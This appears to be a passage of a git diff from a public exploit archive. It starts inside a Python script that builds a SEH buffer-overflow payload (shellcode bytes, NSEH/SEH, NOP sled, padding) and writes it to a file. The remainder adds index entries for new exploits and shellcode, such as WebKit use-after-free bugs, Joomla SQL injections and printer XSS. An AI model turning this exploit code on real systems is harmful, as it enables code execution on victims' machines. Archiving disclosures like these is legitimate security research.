+buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
+buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
+pad = "B" * (5100 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
+
+payload = buffer + NSEH + SEH + nops + buf + pad
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 2eb9455db..4fae1e9c6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6126,6 +6126,15 @@ id,file,description,date,author,type,platform,port
 45450,exploits/linux/dos/45450.txt,"udisks2 2.8.0 - Denial of Service (PoC)",2018-09-24,"Marshall Whittaker",dos,linux,
 45453,exploits/windows_x86/dos/45453.py,"Termite 3.4 - Denial of Service (PoC)",2018-09-24,"Abdullah Alıç",dos,windows_x86,
 45455,exploits/windows_x86/dos/45455.py,"SoftX FTP Client 3.3 - Denial of Service (PoC)",2018-09-24,"Cemal Cihad ÇİFTÇİ",dos,windows_x86,
+45480,exploits/multiple/dos/45480.html,"WebKit - 'WebCore::SVGAnimateElementBase::resetAnimatedType' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
+45481,exploits/multiple/dos/45481.html,"WebKit - 'WebCore::AXObjectCache::handleMenuItemSelected' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
+45482,exploits/multiple/dos/45482.html,"WebKit - 'WebCore::Node::ensureRareData' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
+45483,exploits/multiple/dos/45483.html,"WebKit - 'WebCore::InlineTextBox::paint' Out-of-Bounds Read",2018-09-25,"Google Security Research",dos,multiple,
+45484,exploits/multiple/dos/45484.html,"WebKit - 'WebCore::RenderMultiColumnSet::updateMinimumColumnHeight' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
+45485,exploits/multiple/dos/45485.html,"WebKit - 'WebCore::SVGTRefElement::updateReferencedText' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
+45486,exploits/multiple/dos/45486.html,"WebKit - 'WebCore::RenderLayer::updateDescendantDependentFlags' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
+45488,exploits/multiple/dos/45488.html,"WebKit - 'WebCore::SVGTextLayoutAttributes::context' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
+45489,exploits/multiple/dos/45489.html,"WebKit - 'WebCore::RenderTreeBuilder::removeAnonymousWrappersForInlineChildrenIfNeeded' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9989,6 +9998,9 @@ id,file,description,date,author,type,platform,port
 45412,exploits/windows_x86/local/45412.py,"Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)",2018-09-14,"Gionathan Reale",local,windows_x86,
 45433,exploits/solaris/local/45433.rb,"Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit)",2018-09-18,Metasploit,local,solaris,
 45442,exploits/windows_x86/local/45442.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)",2018-09-20,"Abdullah Alıç",local,windows_x86,
+45467,exploits/windows_x86/local/45467.py,"Easy PhoroResQ 1.0 - Buffer Overflow",2018-09-25,"Cemal Cihad ÇİFTÇİ",local,windows_x86,
+45479,exploits/solaris/local/45479.rb,"Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)",2018-09-25,Metasploit,local,solaris,
+45492,exploits/windows_x86/local/45492.py,"Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)",2018-09-25,"Gionathan Reale",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39994,7 +40006,7 @@ id,file,description,date,author,type,platform,port
 45439,exploits/php/webapps/45439.txt,"WordPress Plugin Localize My Post 1.0 - Local File Inclusion",2018-09-19,"Manuel García Cárdenas",webapps,php,80
 45440,exploits/hardware/webapps/45440.py,"LG SuperSign EZ CMS 2.5 - Local File Inclusion",2018-09-19,"Alejandro Fanjul",webapps,hardware,9080
 45445,exploits/php/webapps/45445.txt,"Navigate CMS 2.8 - Cross-Site Scripting",2018-09-24,Renzi,webapps,php,80
-45446,exploits/hardware/webapps/45446.txt,"Collectric CMU 1.0 - 'lang' SQL injection",2018-09-21,"Simon Brannstrom",webapps,hardware,
+45446,exploits/hardware/webapps/45446.txt,"Collectric CMU 1.0 - 'lang' Hard-Coded Credentials / SQL injection",2018-09-21,"Simon Brannstrom",webapps,hardware,
 45447,exploits/php/webapps/45447.txt,"Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection",2018-09-24,"Haboob Team",webapps,php,80
 45448,exploits/hardware/webapps/45448.py,"LG SuperSign EZ CMS 2.5 - Remote Code Execution",2018-09-24,"Alejandro Fanjul",webapps,hardware,9080
 45449,exploits/php/webapps/45449.txt,"MyBB Visual Editor 1.8.18 - Cross-Site Scripting",2018-09-24,"Numan OZDEMIR",webapps,php,80
@@ -40003,3 +40015,23 @@ id,file,description,date,author,type,platform,port
 45454,exploits/hardware/webapps/45454.txt,"RICOH Aficio MP 301 Printer - Cross-Site Scripting",2018-09-24,"Ismail Tasdelen",webapps,hardware,80
 45456,exploits/php/webapps/45456.txt,"Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection",2018-09-24,"Ihsan Sencan",webapps,php,80
 45460,exploits/hardware/webapps/45460.txt,"RICOH MP C6003 Printer - Cross-Site Scripting",2018-09-24,"Ismail Tasdelen",webapps,hardware,80
+45461,exploits/hardware/webapps/45461.txt,"RICOH MP C2003 Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
+45462,exploits/php/webapps/45462.txt,"Joomla! Component Dutch Auction Factory 2.0.2 - 'filter_order_Dir' SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,
+45463,exploits/php/webapps/45463.txt,"Super Cms Blog Pro 1.0 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45464,exploits/php/webapps/45464.txt,"Joomla! Component Raffle Factory 3.5.2 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45465,exploits/php/webapps/45465.txt,"Joomla! Component Music Collection 3.0.3 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45466,exploits/php/webapps/45466.txt,"Joomla! Component Penny Auction Factory 2.0.4 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45468,exploits/php/webapps/45468.txt,"Joomla! Component Questions 1.4.3 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45469,exploits/php/webapps/45469.txt,"Joomla! Component Jobs Factory 2.0.4 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45470,exploits/php/webapps/45470.txt,"Joomla! Component Social Factory 3.8.3 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45471,exploits/hardware/webapps/45471.txt,"RICOH MP C6503 Plus Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
+45472,exploits/php/webapps/45472.txt,"Joomla Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection",2018-09-25,AkkuS,webapps,php,
+45473,exploits/php/webapps/45473.txt,"Joomla! Component Swap Factory 2.2.1 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45474,exploits/php/webapps/45474.txt,"Joomla! Component Collection Factory 4.1.9 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45475,exploits/php/webapps/45475.txt,"Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45476,exploits/php/webapps/45476.txt,"Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45477,exploits/php/webapps/45477.txt,"Joomla! Component Article Factory Manager 4.3.9 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45478,exploits/php/webapps/45478.txt,"Joomla! Component Timetable Schedule 3.6.8 - SQL Injection",2018-09-25,"Ihsan Sencan",webapps,php,80
+45487,exploits/hardware/webapps/45487.txt,"RICOH MP 305+ Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
+45490,exploits/hardware/webapps/45490.txt,"RICOH MP C406Z Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
+45491,exploits/php/webapps/45491.txt,"Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection",2018-09-25,AkkuS,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index e2e0e9aee..f5f2db590 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -915,4 +915,4 @@ id,file,description,date,author,type,platform
 45426,shellcodes/arm/45426.c,"Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes)",2018-09-18,"Ken Kitahara",shellcode,arm
 45441,shellcodes/linux_x86/45441.c,"Linux/x86 - Egghunter (0x50905090) + sigaction() Shellcode (27 bytes)",2018-09-20,"Valerio Brussani",shellcode,linux_x86
 45458,shellcodes/arm/45458.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm
-45459,shellcodes/arm/45459.c,"Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm
+45459,shellcodes/arm/45459.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) + sigaction() Shellcode (52 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm